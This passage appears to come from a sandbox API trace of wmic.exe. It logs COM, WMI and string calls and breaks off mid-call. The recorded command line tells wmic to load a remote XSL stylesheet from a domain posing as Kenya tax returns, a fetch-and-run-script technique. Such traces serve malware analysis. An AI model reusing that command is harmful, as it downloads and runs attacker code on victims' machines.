[0050.182] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.183] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.183] SysStringLen (param_1="TABLE") returned 0x5 [0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.183] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.183] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.183] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.183] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.183] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.183] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.183] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.183] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.183] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.183] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=19, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.183] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0 [0050.183] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.183] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.183] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.183] SysStringLen (param_1="TABLE") returned 0x5 [0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.183] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.183] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.183] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.183] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.184] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.184] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.184] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.184] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=20, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.184] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0 [0050.184] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.184] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.184] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.184] SysStringLen (param_1="TABLE") returned 0x5 [0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.184] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.184] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.184] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.184] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.184] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.184] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.184] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.184] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.184] IUnknown:Release (This=0x233e1a2ca30) returned 0x0 [0050.184] IUnknown:Release (This=0x233e1a294a0) returned 0x1 [0050.184] FreeThreadedDOMDocument:IUnknown:Release (This=0x233e1a26f20) returned 0x0 [0050.184] GetCommandLineW () returned="wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" " [0050.185] memcpy_s (in: _Destination=0x233e14f8930, _DestinationSize=0x8e, _Source=0x233e1211a4c, _SourceSize=0x82 | out: _Destination=0x233e14f8930) returned 0x0 [0050.185] GetLocalTime (in: lpSystemTime=0x350027f6f0 | out: lpSystemTime=0x350027f6f0*(wYear=0x7e2, wMonth=0x6, wDayOfWeek=0x2, wDay=0x1a, wHour=0x16, wMinute=0x3b, wSecond=0x5, wMilliseconds=0x3e0)) [0050.186] _vsnwprintf (in: _Buffer=0x233e14f80e0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x350027f598 | out: _Buffer="06-26-2018T22:59:05") returned 19 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString="os") returned 2 [0050.186] _wcsicmp (_String1="os", _String2="\"NULL\"") returned 77 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString="get") returned 3 [0050.186] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69 [0050.186] memmove_s (in: _Destination=0x233e14fb170, _DestinationSize=0x8, _Source=0x233e14fb8d0, _SourceSize=0x8 | out: _Destination=0x233e14fb170) returned 0x0 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString="/") returned 1 [0050.186] memmove_s (in: _Destination=0x233e14fb430, _DestinationSize=0x10, _Source=0x233e14fb170, _SourceSize=0x10 | out: _Destination=0x233e14fb430) returned 0x0 [0050.186] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.186] lstrlenW (lpString="ASSOC") returned 5 [0050.186] lstrlenW (lpString="format") returned 6 [0050.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0050.186] lstrlenW (lpString="FORMAT") returned 6 [0050.186] lstrlenW (lpString="format") returned 6 [0050.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2 [0050.186] lstrlenW (lpString="/") returned 1 [0050.186] lstrlenW (lpString="/") returned 1 [0050.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0050.186] lstrlenW (lpString="format") returned 6 [0050.186] _wcsicmp (_String1="format", _String2="\"NULL\"") returned 68 [0050.186] lstrlenW (lpString="format") returned 6 [0050.186] memmove_s (in: _Destination=0x233e14fb980, _DestinationSize=0x18, _Source=0x233e14fb430, _SourceSize=0x18 | out: _Destination=0x233e14fb980) returned 0x0 [0050.186] memmove_s (in: _Destination=0x233e14f72e0, _DestinationSize=0x20, _Source=0x233e14fb980, _SourceSize=0x20 | out: _Destination=0x233e14f72e0) returned 0x0 [0050.186] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43 [0050.187] _wcsicmp (_String1="\"https://itaxkenya.com/kra/tax_returns.xsl\"", _String2="\"NULL\"") returned -6 [0050.187] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43 [0050.187] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43 [0050.187] lstrlenW (lpString=" os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61 [0050.187] lstrlenW (lpString="QUIT") returned 4 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="QUIT", cchCount2=4) returned 1 [0050.187] lstrlenW (lpString="EXIT") returned 4 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="EXIT", cchCount2=4) returned 3 [0050.187] WbemLocator:IUnknown:AddRef (This=0x233e12241d0) returned 0x2 [0050.187] lstrlenW (lpString="/") returned 1 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="/", cchCount2=1) returned 3 [0050.187] lstrlenW (lpString="-") returned 1 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="-", cchCount2=1) returned 3 [0050.187] lstrlenW (lpString="CLASS") returned 5 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CLASS", cchCount2=5) returned 3 [0050.187] lstrlenW (lpString="PATH") returned 4 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="PATH", cchCount2=4) returned 1 [0050.187] lstrlenW (lpString="CONTEXT") returned 7 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CONTEXT", cchCount2=7) returned 3 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] lstrlenW (lpString="os") returned 2 [0050.187] GetCurrentThreadId () returned 0xdf0 [0050.187] ??0CHString@@QEAA@XZ () returned 0x350027f450 [0050.187] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233e12241d0, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da898 | out: ppNamespace=0x7ff66e6da898*=0x233e1287c80) returned 0x0 [0050.554] CoSetProxyBlanket (pProxy=0x233e1287c80, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0050.554] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.554] GetCurrentThreadId () returned 0xdf0 [0050.554] ??0CHString@@QEAA@XZ () returned 0x350027f2e8 [0050.555] SysStringLen (param_1="root\\cli") returned 0x8 [0050.555] SysStringLen (param_1="\\") returned 0x1 [0050.555] SysStringLen (param_1="root\\cli\\") returned 0x9 [0050.555] SysStringLen (param_1="ms_409") returned 0x6 [0050.555] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233e12241d0, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da8a0 | out: ppNamespace=0x7ff66e6da8a0*=0x233e1292640) returned 0x0 [0050.615] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.615] GetCurrentThreadId () returned 0xdf0 [0050.615] ??0CHString@@QEAA@XZ () returned 0x350027f468 [0050.615] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0050.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bdbc0, cbMultiByte=-1, lpWideCharStr=0x233e14fb930, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0050.615] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0050.615] SysStringLen (param_1="os") returned 0x2 [0050.615] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e [0050.616] SysStringLen (param_1="'") returned 0x1 [0050.616] IWbemServices:GetObject (in: This=0x233e1287c80, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0x350027f380*=0x0, ppCallResult=0x0 | out: ppObject=0x350027f380*=0x233e12748a0, ppCallResult=0x0) returned 0x0 [0050.631] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="Target", lFlags=0, pVal=0x350027f398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f398*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_OperatingSystem", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.631] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35 [0050.631] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35 [0050.631] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="PWhere", lFlags=0, pVal=0x350027f398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f398*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.631] lstrlenW (lpString="") returned 0 [0050.631] lstrlenW (lpString="") returned 0 [0050.631] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="Connection", lFlags=0, pVal=0x350027f398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f398*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12b4830, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.631] IUnknown:QueryInterface (in: This=0x233e12b4830, riid=0x7ff66e6c34f8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350027f388 | out: ppvObject=0x350027f388*=0x233e12b4830) returned 0x0 [0050.631] GetCurrentThreadId () returned 0xdf0 [0050.631] ??0CHString@@QEAA@XZ () returned 0x350027f298 [0050.631] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Namespace", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.631] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0050.631] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0050.631] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Locale", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e888, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.632] lstrlenW (lpString="ms_409") returned 6 [0050.632] lstrlenW (lpString="ms_409") returned 6 [0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="User", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e888, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Password", lFlags=0, pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Server", lFlags=0, pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.632] lstrlenW (lpString=".") returned 1 [0050.632] lstrlenW (lpString=".") returned 1 [0050.632] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Authority", lFlags=0, pVal=0x350027f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e888, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2a8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.632] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.632] IUnknown:Release (This=0x233e12b4830) returned 0x1 [0050.632] GetCurrentThreadId () returned 0xdf0 [0050.632] ??0CHString@@QEAA@XZ () returned 0x350027f298 [0050.632] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="__RELPATH", lFlags=0, pVal=0x350027f2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"OS\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.632] GetCurrentThreadId () returned 0xdf0 [0050.632] ??0CHString@@QEAA@XZ () returned 0x350027f160 [0050.632] ??0CHString@@QEAA@PEBG@Z () returned 0x350027f180 [0050.633] ??0CHString@@QEAA@AEBV0@@Z () returned 0x350027f0f8 [0050.633] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c [0050.633] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x233e14fbc40 [0050.633] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0050.633] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x350027f108 [0050.633] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x350027f100 [0050.633] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f180 [0050.633] ??1CHString@@QEAA@XZ () returned 0x1 [0050.633] ??1CHString@@QEAA@XZ () returned 0x1 [0050.633] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x350027f0d0 [0050.633] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f0f8 [0050.633] ??1CHString@@QEAA@XZ () returned 0x1 [0050.633] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x233e14fb670 [0050.633] ?Find@CHString@@QEBAHPEBG@Z () returned 0x2 [0050.633] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x350027f108 [0050.633] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x350027f100 [0050.633] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f180 [0050.633] ??1CHString@@QEAA@XZ () returned 0x1 [0050.633] ??1CHString@@QEAA@XZ () returned 0x1 [0050.633] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x350027f0d0 [0050.633] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x350027f0f8 [0050.633] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.633] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7ffbfe196270 [0050.633] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.633] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0050.633] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0050.634] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0050.634] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x21 [0050.634] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x74 [0050.634] SysStringLen (param_1="\"") returned 0x1 [0050.634] IWbemServices:GetObject (in: This=0x233e1292640, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x350027f150*=0x0, ppCallResult=0x0 | out: ppObject=0x350027f150*=0x233e12b4830, ppCallResult=0x0) returned 0x0 [0050.637] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Text", lFlags=0, pVal=0x350027f190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f190*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bcd0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1270e50, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.637] SafeArrayGetLBound (in: psa=0x233e128bcd0, nDim=0x1, plLbound=0x350027f168 | out: plLbound=0x350027f168) returned 0x0 [0050.637] SafeArrayGetUBound (in: psa=0x233e128bcd0, nDim=0x1, plUbound=0x350027f16c | out: plUbound=0x350027f16c) returned 0x0 [0050.637] SafeArrayGetElement (in: psa=0x233e128bcd0, rgIndices=0x350027f158, pv=0x350027f170 | out: pv=0x350027f170) returned 0x0 [0050.637] SysStringLen (param_1="Installed Operating System/s management. ") returned 0x29 [0050.637] IUnknown:Release (This=0x233e12b4830) returned 0x0 [0050.637] ??1CHString@@QEAA@XZ () returned 0x1 [0050.637] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.637] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.637] lstrlenW (lpString="Installed Operating System/s management. ") returned 41 [0050.637] lstrlenW (lpString="Installed Operating System/s management. ") returned 41 [0050.637] IUnknown:Release (This=0x233e12748a0) returned 0x0 [0050.638] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.638] lstrlenW (lpString="PATH") returned 4 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="PATH", cchCount2=4) returned 1 [0050.638] lstrlenW (lpString="WHERE") returned 5 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="WHERE", cchCount2=5) returned 1 [0050.638] lstrlenW (lpString="(") returned 1 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="(", cchCount2=1) returned 3 [0050.638] lstrlenW (lpString="/") returned 1 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3 [0050.638] lstrlenW (lpString="-") returned 1 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3 [0050.638] lstrlenW (lpString="GET") returned 3 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2 [0050.638] lstrlenW (lpString="/") returned 1 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3 [0050.638] lstrlenW (lpString="-") returned 1 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] lstrlenW (lpString="GET") returned 3 [0050.638] lstrlenW (lpString="get") returned 3 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2 [0050.638] lstrlenW (lpString="/") returned 1 [0050.638] lstrlenW (lpString="/") returned 1 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0050.638] lstrlenW (lpString="/") returned 1 [0050.638] lstrlenW (lpString="/") returned 1 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0050.638] lstrlenW (lpString="?") returned 1 [0050.638] lstrlenW (lpString="format") returned 6 [0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="?", cchCount2=1) returned 3 [0050.639] lstrlenW (lpString="VALUE") returned 5 [0050.639] lstrlenW (lpString="format") returned 6 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="VALUE", cchCount2=5) returned 1 [0050.639] lstrlenW (lpString="ALL") returned 3 [0050.639] lstrlenW (lpString="format") returned 6 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ALL", cchCount2=3) returned 3 [0050.639] lstrlenW (lpString="FORMAT") returned 6 [0050.639] lstrlenW (lpString="format") returned 6 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2 [0050.639] lstrlenW (lpString="/") returned 1 [0050.639] lstrlenW (lpString=":") returned 1 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0050.639] lstrlenW (lpString="-") returned 1 [0050.639] lstrlenW (lpString=":") returned 1 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="-", cchCount2=1) returned 3 [0050.639] lstrlenW (lpString=":") returned 1 [0050.639] lstrlenW (lpString=":") returned 1 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2=":", cchCount2=1) returned 2 [0050.639] lstrlenW (lpString="/") returned 1 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, 